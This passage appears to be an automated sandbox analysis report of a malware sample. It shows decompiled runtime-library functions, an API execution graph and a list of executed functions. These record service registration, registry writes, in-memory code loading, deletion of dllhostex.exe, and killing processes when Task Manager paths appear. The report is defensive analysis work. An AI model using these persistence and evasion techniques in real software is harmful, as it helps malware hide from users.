				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000;
					_t75 = E0026013F(_t51, _t70, __eflags, _v16, _t70);
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E0025CAF0();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x2728e8;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0x2728e8) {
								E0025D2F4( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x272b68 & 0x00000001;
							if(( *0x272b68 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E0025FBE8(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0x272b08; // 0x14c9348
									 *0x2725e4 = _t44;
								}
							}
						}
						L6:
						E0025D2F4(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E0025D495())) = 0x16;
						goto L5;
					}
				}
			}















                                                0x0025ff7e
                                                0x0025ff8b
                                                0x0025ff8e
                                                0x0025ff96
                                                0x0025ff9f
                                                0x0025ffa2
                                                0x0025ffa8
                                                0x00000000
                                                0x0025ffaa
                                                0x0025ffae
                                                0x0025ffb0
                                                0x0025ffbb
                                                0x0025ffbd
                                                0x0025ffc1
                                                0x0025ffc3
                                                0x0025fff3
                                                0x0025fff3
                                                0x00000000
                                                0x0025ffc5
                                                0x0025ffd2
                                                0x0025ffd8
                                                0x0025ffe0
                                                0x0025ffe4
                                                0x0025ffe6
                                                0x00260005
                                                0x00260009
                                                0x0026000b
                                                0x0026000b
                                                0x00260016
                                                0x0026001a
                                                0x0026001b
                                                0x0026001d
                                                0x00260020
                                                0x00260027
                                                0x0026002c
                                                0x00260031
                                                0x00260027
                                                0x00260032
                                                0x00260038
                                                0x0026003d
                                                0x0026003f
                                                0x00260042
                                                0x00260045
                                                0x0026004c
                                                0x0026004e
                                                0x00260055
                                                0x0026005a
                                                0x00260063
                                                0x00260068
                                                0x0026006e
                                                0x00260070
                                                0x00260075
                                                0x00260075
                                                0x0026006e
                                                0x00260055
                                                0x0025fff5
                                                0x0025fff6
                                                0x00000000
                                                0x0025ffe8
                                                0x0025ffed
                                                0x00000000
                                                0x0025ffed
                                                0x0025ffe6

                                                APIs
                                                  • Part of subcall function 0025E966: GetLastError.KERNEL32(?,?,0025A9FA,?,?,?,0025A5BB,?), ref: 0025E96A
                                                  • Part of subcall function 0025E966: _free.LIBCMT ref: 0025E99D
                                                  • Part of subcall function 0025E966: SetLastError.KERNEL32(00000000), ref: 0025E9DE
                                                  • Part of subcall function 0025E966: _abort.LIBCMT ref: 0025E9E4
                                                  • Part of subcall function 0026009D: _abort.LIBCMT ref: 002600CF
                                                  • Part of subcall function 0026009D: _free.LIBCMT ref: 00260103
                                                  • Part of subcall function 0025FD12: GetOEMCP.KERNEL32(00000000,?,?,0025FF9B,?), ref: 0025FD3D
                                                • _free.LIBCMT ref: 0025FFF6
                                                • _free.LIBCMT ref: 0026002C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$ErrorLast_abort
                                                • String ID: ('
                                                • API String ID: 2991157371-476483421
                                                • Opcode ID: 846f7f03ca7f458dd2d30dfa1fc694e7eddc6a1a66a72961e3ac66b9c00d4878
                                                • Instruction ID: 2b8c9430732e2c685f8283233cfe7b50a9cd480012c8577af6ba6fd382947b66
                                                • Opcode Fuzzy Hash: 846f7f03ca7f458dd2d30dfa1fc694e7eddc6a1a66a72961e3ac66b9c00d4878
                                                • Instruction Fuzzy Hash: 4D313831914249EFDB20DF68D581B9EB7F0EF01321F2500A9EC049B291EB729DA8DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00257097 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 46%
                                                			E00257097(void* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebp;
				void* _t4;
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t11;

				_t9 = __ecx;
				asm("repne jnz 0x5");
				asm("repne ret");
				asm("repne jmp 0x74");
				while(1) {
					_push(_a4);
					_t4 = E0025B87D(_t9);
					_pop(_t10);
					if(_t4 != 0) {
						break;
					}
					_t5 = E0025BEAE(_t8, _t10, _t11, __eflags, _a4);
					_pop(_t9);
					__eflags = _t5;
					if(_t5 == 0) {
						__eflags = _a4 - 0xffffffff;
						if(__eflags != 0) {
							E00257EA5(__eflags);
						} else {
							E002575CF(__eflags);
						}
					}
				}
				return _t4;
			}










                                                0x00257097
                                                0x0025709d
                                                0x002570a0
                                                0x002570a2
                                                0x002570cc
                                                0x002570cc
                                                0x002570cf
                                                0x002570d4
                                                0x002570d7
                                                0x00000000
                                                0x00000000
                                                0x002570b0
                                                0x002570b5
                                                0x002570b6
                                                0x002570b8
                                                0x002570ba
                                                0x002570be
                                                0x002570c7
                                                0x002570c0
                                                0x002570c0
                                                0x002570c0
                                                0x002570be
                                                0x002570b8
                                                0x002570da

                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00257121
                                                • ___raise_securityfailure.LIBCMT ref: 00257208
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                • String ID: 5'
                                                • API String ID: 3761405300-3224889391
                                                • Opcode ID: 57e3100963a4b38fdef7b76c59736bfb6a1c17e87e280c50a31b688f28dbaea2
                                                • Instruction ID: fa1a1ca1ce6cb3e6ea8e79c39b571b20aa17231466cf27f7ffe314091411ebe2
                                                • Opcode Fuzzy Hash: 57e3100963a4b38fdef7b76c59736bfb6a1c17e87e280c50a31b688f28dbaea2
                                                • Instruction Fuzzy Hash: F52102B4951200AAD710DF19FD8AA417BE8FB1C710F50812AE90CCB3A0E3B09AD4EF4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0026009D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 69%
                                                			E0026009D(void* __ebx, void* __ecx, void* __edx, void* __edi) {
				signed int _t15;
				intOrPtr _t20;
				void* _t24;
				signed int _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t34;

				_t26 = __edx;
				_t24 = __ecx;
				_t23 = __ebx;
				E00257B60(__ebx, __edi, 0x26fb48, 0xc);
				_t29 = 0;
				 *((intOrPtr*)(_t30 - 0x1c)) = 0;
				_t28 = E0025E966(__ebx, _t24, __edx);
				_t25 =  *0x272b68; // 0xfffffffe
				if(( *(_t28 + 0x350) & _t25) == 0 ||  *((intOrPtr*)(_t28 + 0x4c)) == 0) {
					L5:
					_t15 = E0025F698(5);
					_pop(_t25);
					 *((intOrPtr*)(_t30 - 4)) = _t29;
					_t29 =  *((intOrPtr*)(_t28 + 0x48));
					 *((intOrPtr*)(_t30 - 0x1c)) = _t29;
					_t34 = _t29 -  *0x272b08; // 0x14c9348
					if(_t34 != 0) {
						if(_t29 != 0) {
							asm("lock xadd [esi], eax");
							if((_t15 | 0xffffffff) == 0 && _t29 != 0x2728e8) {
								E0025D2F4(_t29);
								_pop(_t25);
							}
						}
						_t20 =  *0x272b08; // 0x14c9348
						 *((intOrPtr*)(_t28 + 0x48)) = _t20;
						_t29 =  *0x272b08; // 0x14c9348
						 *((intOrPtr*)(_t30 - 0x1c)) = _t29;
						asm("lock inc dword [esi]");
					}
					 *((intOrPtr*)(_t30 - 4)) = 0xfffffffe;
					E0026012E();
					goto L3;
				} else {
					_t29 =  *((intOrPtr*)(_t28 + 0x48));
					L3:
					if(_t29 != 0) {
						return E00257BA6();
					}
					E0025D37C(_t23, _t25, _t26, _t28, _t29);
					goto L5;
				}
			}











                                                0x0026009d
                                                0x0026009d
                                                0x0026009d
                                                0x002600a4
                                                0x002600a9
                                                0x002600ab
                                                0x002600b3
                                                0x002600b5
                                                0x002600c1
                                                0x002600d4
                                                0x002600d6
                                                0x002600db
                                                0x002600dc
                                                0x002600df
                                                0x002600e2
                                                0x002600e5
                                                0x002600eb
                                                0x002600ef
                                                0x002600f4
                                                0x002600f8
                                                0x00260103
                                                0x00260108
                                                0x00260108
                                                0x002600f8
                                                0x00260109
                                                0x0026010e
                                                0x00260111
                                                0x00260117
                                                0x0026011a
                                                0x0026011a
                                                0x0026011d
                                                0x00260124
                                                0x00000000
                                                0x002600c8
                                                0x002600c8
                                                0x002600cb
                                                0x002600cd
                                                0x0026013e
                                                0x0026013e
                                                0x002600cf
                                                0x00000000
                                                0x002600cf

                                                APIs
                                                  • Part of subcall function 0025E966: GetLastError.KERNEL32(?,?,0025A9FA,?,?,?,0025A5BB,?), ref: 0025E96A
                                                  • Part of subcall function 0025E966: _free.LIBCMT ref: 0025E99D
                                                  • Part of subcall function 0025E966: SetLastError.KERNEL32(00000000), ref: 0025E9DE
                                                  • Part of subcall function 0025E966: _abort.LIBCMT ref: 0025E9E4
                                                • _abort.LIBCMT ref: 002600CF
                                                • _free.LIBCMT ref: 00260103
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ErrorLast_abort_free
                                                • String ID: ('
                                                • API String ID: 289325740-476483421
                                                • Opcode ID: 02f122a3a036fddc83a0b979172a52fd1f2dc693ca821adbbb2f0915cf76f2e0
                                                • Instruction ID: ab0bafc6908098eba451f4f354e158d3a34bc86097ba633ef42257825d7ee462
                                                • Opcode Fuzzy Hash: 02f122a3a036fddc83a0b979172a52fd1f2dc693ca821adbbb2f0915cf76f2e0
                                                • Instruction Fuzzy Hash: B301D231C21A26DBCB31AF289481B1EB360FF04B21F05014AE99873291CB306EE5DFC5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025C49E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E0025C49E(void* __ebx, void* __ecx) {
				intOrPtr _t3;
				signed int _t15;
				signed int _t16;

				if( *0x273a60 == 0) {
					_push(_t15);
					E0026007F(__ecx);
					_t19 = E00260459();
					if(_t2 != 0) {
						_t3 = E0025C4F7(__ebx, _t19);
						if(_t3 != 0) {
							 *0x273a6c = _t3;
							E0026142B(0x273a60, _t3);
							_t16 = 0;
						} else {
							_t16 = _t15 | 0xffffffff;
						}
						E0025D2F4(0);
					} else {
						_t16 = _t15 | 0xffffffff;
					}
					E0025D2F4(_t19);
					return _t16;
				} else {
					return 0;
				}
			}






                                                0x0025c4a5
                                                0x0025c4ab
                                                0x0025c4ac
                                                0x0025c4b6
                                                0x0025c4ba
                                                0x0025c4c2
                                                0x0025c4ca
                                                0x0025c4d7
                                                0x0025c4dc
                                                0x0025c4e1
                                                0x0025c4cc
                                                0x0025c4cc
                                                0x0025c4cc
                                                0x0025c4e5
                                                0x0025c4bc
                                                0x0025c4bc
                                                0x0025c4bc
                                                0x0025c4ec
                                                0x0025c4f6
                                                0x0025c4a7
                                                0x0025c4a9
                                                0x0025c4a9

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID: `:'
                                                • API String ID: 269201875-926251296
                                                • Opcode ID: 0141a83a9818d3058b96f7be9cc062bdd0ffa3bb889ea24b56657153b0441b55
                                                • Instruction ID: f622a530fe64ab34a9344dd8e3212560618477ff3e7531991f1cae6ec8287d69
                                                • Opcode Fuzzy Hash: 0141a83a9818d3058b96f7be9cc062bdd0ffa3bb889ea24b56657153b0441b55
                                                • Instruction Fuzzy Hash: B6E0EC52575611499271723E7C26B7B01455BC1333F214325FC24C61D1EF7489FAA85A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:4.1%
                                                Dynamic/Decrypted Code Coverage:16.7%
                                                Signature Coverage:3.3%
                                                Total number of Nodes:240
                                                Total number of Limit Nodes:11
                                                execution_graph 22250 6fd55670 22251 6fd55695 _strncpy 22250->22251 22264 6fd59235 22251->22264 22254 6fd556c6 FreeConsole SetServiceStatus SetServiceStatus 22267 6fd55490 22254->22267 22255 6fd557ca 22274 6fd5599e 22255->22274 22259 6fd557d5 22260 6fd55790 Sleep 22261 6fd557a4 WaitForSingleObject CloseHandle 22260->22261 22262 6fd5579f 22260->22262 22261->22255 22263 6fd557c1 Sleep 22261->22263 22262->22260 22262->22261 22263->22263 22281 6fd58fb4 22264->22281 22268 6fd554cf _strncpy 22267->22268 22269 6fd554f8 RegOpenKeyA 22268->22269 22270 6fd5556c RegCloseKey 22269->22270 22271 6fd55529 RegQueryValueExA RegCloseKey SetLastError 22269->22271 22272 6fd5599e TranslatorGuardHandler 5 API calls 22270->22272 22271->22270 22273 6fd55586 CreateThread 22272->22273 22273->22260 22313 6fd55430 22273->22313 22275 6fd559a7 22274->22275 22276 6fd559a9 IsProcessorFeaturePresent 22274->22276 22275->22259 22278 6fd560a7 22276->22278 22312 6fd5606b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22278->22312 22280 6fd5618a 22280->22259 22282 6fd58fe1 22281->22282 22283 6fd58ff0 22282->22283 22284 6fd59008 22282->22284 22296 6fd58fe5 22282->22296 22307 6fd5a350 20 API calls _free 22283->22307 22309 6fd58df3 38 API calls 2 library calls 22284->22309 22287 6fd5599e TranslatorGuardHandler 5 API calls 22290 6fd556a6 RegisterServiceCtrlHandlerA 22287->22290 22288 6fd58ff5 22308 6fd5a294 26 API calls _abort 22288->22308 22289 6fd59013 22292 6fd591b5 22289->22292 22293 6fd5901e 22289->22293 22290->22254 22290->22255 22294 6fd591e2 WideCharToMultiByte 22292->22294 22297 6fd591c0 22292->22297 22295 6fd590c6 WideCharToMultiByte 22293->22295 22299 6fd59029 22293->22299 22304 6fd59063 WideCharToMultiByte 22293->22304 22294->22297 22298 6fd590f1 22295->22298 22295->22299 22296->22287 22297->22296 22311 6fd5a350 20 API calls _free 22297->22311 22298->22299 22302 6fd590fa GetLastError 22298->22302 22299->22296 22310 6fd5a350 20 API calls _free 22299->22310 22302->22299 22306 6fd59109 22302->22306 22304->22299 22305 6fd59122 WideCharToMultiByte 22305->22297 22305->22306 22306->22296 22306->22297 22306->22305 22307->22288 22308->22296 22309->22289 22310->22296 22311->22296 22312->22280 22314 6fd5546a 22313->22314 22315 6fd5544a 22313->22315 22328 6fd553d0 Sleep 22314->22328 22321 6fd55590 22315->22321 22319 6fd5599e TranslatorGuardHandler 5 API calls 22320 6fd5547b 22319->22320 22322 6fd555c8 _strncpy 22321->22322 22323 6fd555e8 RegCreateKeyA 22322->22323 22324 6fd55645 RegCloseKey 22323->22324 22325 6fd55616 RegSetValueExA SetLastError 22323->22325 22326 6fd5599e TranslatorGuardHandler 5 API calls 22324->22326 22325->22324 22327 6fd5565b 22326->22327 22327->22314 22338 6fd549c0 CreateMutexA GetLastError 22328->22338 22330 6fd553e3 22331 6fd5542c 22330->22331 22349 6fd548c0 22330->22349 22331->22319 22333 6fd553ec 22333->22331 22362 6fd54950 22333->22362 22335 6fd553f5 22335->22331 22336 6fd553f9 CreateThread CreateThread 22335->22336 22337 6fd55423 Sleep 22336->22337 22458 6fd55290 EnterCriticalSection 22336->22458 22463 6fd55320 22336->22463 22337->22337 22339 6fd54a27 22338->22339 22340 6fd54a39 22338->22340 22341 6fd54a2b ReleaseMutex CloseHandle 22339->22341 22344 6fd54a4f 22339->22344 22342 6fd5599e TranslatorGuardHandler 5 API calls 22340->22342 22341->22340 22343 6fd54a4b 22342->22343 22343->22330 22344->22344 22368 6fd54160 RegCreateKeyExA 22344->22368 22346 6fd54a90 22347 6fd5599e TranslatorGuardHandler 5 API calls 22346->22347 22348 6fd54aa5 22347->22348 22348->22330 22373 6fd547e0 EnterCriticalSection 22349->22373 22351 6fd548cb EnterCriticalSection 22383 6fd53eb0 CreateFileA 22351->22383 22353 6fd548f0 22354 6fd54939 22353->22354 22392 6fd53fa0 22353->22392 22355 6fd5493e LeaveCriticalSection 22354->22355 22355->22333 22358 6fd5491e 22358->22355 22359 6fd54928 LeaveCriticalSection 22358->22359 22400 6fd54330 EnterCriticalSection 22359->22400 22361 6fd54933 22361->22333 22363 6fd54960 22362->22363 22364 6fd54967 22362->22364 22365 6fd559af new 8 API calls 22363->22365 22426 6fd54430 22364->22426 22365->22364 22367 6fd549a4 LocalFree 22367->22335 22369 6fd541c3 22368->22369 22370 6fd5419d RegSetValueExA 22368->22370 22369->22346 22371 6fd541bd RegCloseKey 22370->22371 22372 6fd541c9 RegCloseKey 22370->22372 22371->22369 22372->22346 22374 6fd5483a 22373->22374 22378 6fd54800 22373->22378 22375 6fd54849 LeaveCriticalSection EnterCriticalSection 22374->22375 22376 6fd54896 22375->22376 22382 6fd5486b 22375->22382 22381 6fd548a5 LeaveCriticalSection 22376->22381 22377 6fd54817 LocalFree 22377->22378 22378->22374 22378->22377 22379 6fd54821 LocalFree 22378->22379 22379->22378 22380 6fd5487b LocalFree 22380->22382 22381->22351 22382->22376 22382->22380 22384 6fd53ee5 GetFileSizeEx LocalAlloc 22383->22384 22385 6fd53ede 22383->22385 22386 6fd53f17 CloseHandle 22384->22386 22387 6fd53f26 22384->22387 22385->22353 22386->22353 22390 6fd53f40 ReadFile 22387->22390 22391 6fd53f69 22387->22391 22388 6fd53f72 CloseHandle LocalFree 22388->22353 22389 6fd53f8b CloseHandle 22389->22353 22390->22387 22390->22391 22391->22388 22391->22389 22393 6fd5413a LocalFree 22392->22393 22399 6fd53fbd ___std_exception_copy ___scrt_fastfail 22392->22399 22393->22354 22393->22358 22395 6fd53fd6 LocalAlloc LocalAlloc 22395->22399 22396 6fd5404d LocalAlloc 22396->22399 22398 6fd540a6 LocalFree 22398->22393 22398->22399 22399->22393 22399->22395 22399->22396 22407 6fd559af 22399->22407 22413 6fd53df0 CryptAcquireContextW 22399->22413 22401 6fd5441d LeaveCriticalSection 22400->22401 22403 6fd5434a 22400->22403 22401->22361 22402 6fd54395 LocalFree 22402->22403 22403->22402 22404 6fd543e0 LocalFree 22403->22404 22405 6fd543ff LocalFree 22403->22405 22406 6fd5441b 22403->22406 22404->22403 22405->22403 22406->22401 22410 6fd559b4 ___std_exception_copy 22407->22410 22408 6fd559e0 22408->22399 22410->22408 22423 6fd59263 7 API calls 2 library calls 22410->22423 22424 6fd56276 RaiseException __CxxThrowException@8 new 22410->22424 22425 6fd56259 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 22410->22425 22414 6fd53e15 CryptImportKey 22413->22414 22415 6fd53e0f 22413->22415 22414->22415 22416 6fd53e34 CryptCreateHash 22414->22416 22415->22398 22416->22415 22417 6fd53e4e CryptHashData 22416->22417 22417->22415 22418 6fd53e63 CryptVerifySignatureW 22417->22418 22419 6fd53e97 22418->22419 22420 6fd53e90 CryptDestroyHash 22418->22420 22421 6fd53ea7 22419->22421 22422 6fd53e9e CryptReleaseContext 22419->22422 22420->22419 22421->22398 22422->22421 22423->22410 22424->22410 22427 6fd54469 ___scrt_fastfail 22426->22427 22428 6fd54480 InitializeCriticalSection 22427->22428 22429 6fd544bb 22428->22429 22430 6fd544c4 22429->22430 22431 6fd544cb EnterCriticalSection 22429->22431 22432 6fd547a7 DeleteCriticalSection 22430->22432 22433 6fd559af new 8 API calls 22431->22433 22435 6fd547bf 22432->22435 22434 6fd544dd LocalAlloc 22433->22434 22437 6fd5451e ___scrt_fastfail 22434->22437 22435->22367 22438 6fd559af new 8 API calls 22437->22438 22439 6fd5453c LocalAlloc 22438->22439 22440 6fd54565 ___scrt_fastfail 22439->22440 22441 6fd559af new 8 API calls 22440->22441 22442 6fd54584 LocalAlloc 22441->22442 22444 6fd545da ___scrt_fastfail 22442->22444 22445 6fd559af new 8 API calls 22444->22445 22446 6fd545f6 LocalAlloc 22445->22446 22448 6fd5464f ___scrt_fastfail 22446->22448 22449 6fd559af new 8 API calls 22448->22449 22450 6fd5466b LocalAlloc 22449->22450 22452 6fd546cb ___scrt_fastfail 22450->22452 22453 6fd559af new 8 API calls 22452->22453 22454 6fd546e7 ___scrt_fastfail 22453->22454 22455 6fd5474c LeaveCriticalSection 22454->22455 22456 6fd5479c LocalFree 22455->22456 22457 6fd54764 ___std_exception_copy 22455->22457 22456->22432 22457->22456 22459 6fd552ae 22458->22459 22460 6fd5530a LeaveCriticalSection 22458->22460 22461 6fd55309 22459->22461 22470 6fd54cc0 22459->22470 22461->22460 22464 6fd55330 EnterCriticalSection 22463->22464 22465 6fd553b4 LeaveCriticalSection Sleep 22464->22465 22466 6fd55347 22464->22466 22465->22464 22466->22465 22467 6fd5535b GetTickCount 22466->22467 22468 6fd55371 22467->22468 22468->22466 22469 6fd54cc0 292 API calls 22468->22469 22469->22468 22471 6fd54d2e 22470->22471 22472 6fd54ccb 22470->22472 22471->22459 22473 6fd54cdb 22472->22473 22474 6fd559af new 8 API calls 22472->22474 22475 6fd559af new 8 API calls 22473->22475 22474->22473 22476 6fd54cf7 22475->22476 22477 6fd559af new 8 API calls 22476->22477 22478 6fd54d08 CreateThread 22477->22478 22478->22471 22479 6fd54ca0 22478->22479 22482 6fd54d40 VirtualAlloc 22479->22482 22483 6fd54cab 22482->22483 22486 6fd54d7d 22482->22486 22484 6fd54ec1 VirtualProtect 22491 39987bd 22484->22491 22485 6fd54e53 LoadLibraryA 22485->22483 22485->22486 22486->22484 22486->22485 22487 6fd54ebe 22486->22487 22488 6fd54e7f 22486->22488 22487->22484 22488->22486 22489 6fd54e9a GetProcAddress 22488->22489 22489->22486 22489->22488 22492 39987cb 22491->22492 22493 39987c6 22491->22493 22497 399868a 22492->22497 22514 3998ddb GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 22493->22514 22496 39987d9 22496->22483 22498 3998696 ___FrameUnwindToState 22497->22498 22499 39986ac dllmain_raw 22498->22499 22500 39986a7 22498->22500 22501 39986c6 dllmain_crt_dispatch 22499->22501 22502 3998781 ___FrameUnwindToState 22499->22502 22505 39986e8 22500->22505 22518 399c7a4 12 API calls 2 library calls 22500->22518 22501->22500 22501->22502 22502->22496 22515 39923b0 22505->22515 22507 399871f 22508 3998732 22507->22508 22519 399c840 12 API calls 2 library calls 22507->22519 22508->22502 22511 399873c dllmain_crt_dispatch 22508->22511 22509 39923b0 __DllMainCRTStartup@12 267 API calls 22512 399870b dllmain_crt_dispatch dllmain_raw 22509->22512 22511->22502 22513 399874f dllmain_raw 22511->22513 22512->22507 22513->22502 22514->22492 22516 39923bc CreateThread 22515->22516 22517 39923d2 22515->22517 22516->22517 22520 39921f0 22516->22520 22517->22507 22517->22509 22518->22505 22519->22508 22521 399239a 22520->22521 22522 399220f _memcpy_s 22520->22522 22523 3997eca TranslatorGuardHandler 5 API calls 22521->22523 22524 3992222 GetSystemDirectoryA 22522->22524 22525 39923a7 22523->22525 22526 3991380 48 API calls 22524->22526 22527 399224d 22526->22527 22528 3991380 48 API calls 22527->22528 22529 3992263 _memcpy_s 22528->22529 22530 39922c1 CreateThread CreateThread 22529->22530 22531 3992319 22530->22531 22532 3992366 22531->22532 22533 3992330 Sleep 22531->22533 22534 3992370 TerminateThread 22532->22534 22533->22531 22534->22534 22535 3992381 Sleep 22534->22535 22536 3992398 22535->22536 22536->22521

                                                Executed Functions

                                                Function 03997CA0 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 101sleepfilethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 03997CC8
                                                • DeleteFileA.KERNELBASE(C:\Windows\system32\dllhostex.exe), ref: 03997CCF
                                                • GetVersionExA.KERNEL32(0000009C), ref: 03997CF6
                                                  • Part of subcall function 03991630: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03991666
                                                • Sleep.KERNEL32(00007530), ref: 03997D3F
                                                • Sleep.KERNEL32(00007530), ref: 03997D55
                                                • Sleep.KERNEL32(000001F4), ref: 03997D5C
                                                • WaitForSingleObject.KERNEL32(00000000,0000012C), ref: 03997D67
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 03997D81
                                                • TerminateThread.KERNEL32(?,00000000), ref: 03997D8C
                                                • Sleep.KERNEL32(000003E8), ref: 03997DA4
                                                • DeleteFileA.KERNEL32(C:\Windows\system32\dllhostex.exe), ref: 03997DB4
                                                • Sleep.KERNEL32(00003A98), ref: 03997DC6
                                                • Sleep.KERNELBASE(000001F4), ref: 03997DCD
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 03997DDC
                                                • TerminateThread.KERNEL32(?,00000000), ref: 03997DE7
                                                • Sleep.KERNEL32(00000BB8), ref: 03997E01
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep$Terminate$DeleteFileProcessThread$CreateObjectSingleSnapshotToolhelp32VersionWait
                                                • String ID: C:\Windows\system32\dllhostex.exe$\windows\system32\taskmgr.exe$\windows\syswow64\taskmgr.exe
                                                • API String ID: 3800454311-1893022162
                                                • Opcode ID: be05559b1c67b5b0c883da04f4632576a4da7908668ab0cbbcb737a099cdd645
                                                • Instruction ID: d4bf2174ba8b946d2ecf355580d8d8e509334e26e916affe46193fe083580c78
                                                • Opcode Fuzzy Hash: be05559b1c67b5b0c883da04f4632576a4da7908668ab0cbbcb737a099cdd645
                                                • Instruction Fuzzy Hash: 72315D325A8310ABFF21F7A59D09F6E7AA89F45B80F190815E6846E1C2DFB54404CBD2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03991630 Relevance: 10.6, APIs: 7, Instructions: 137processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
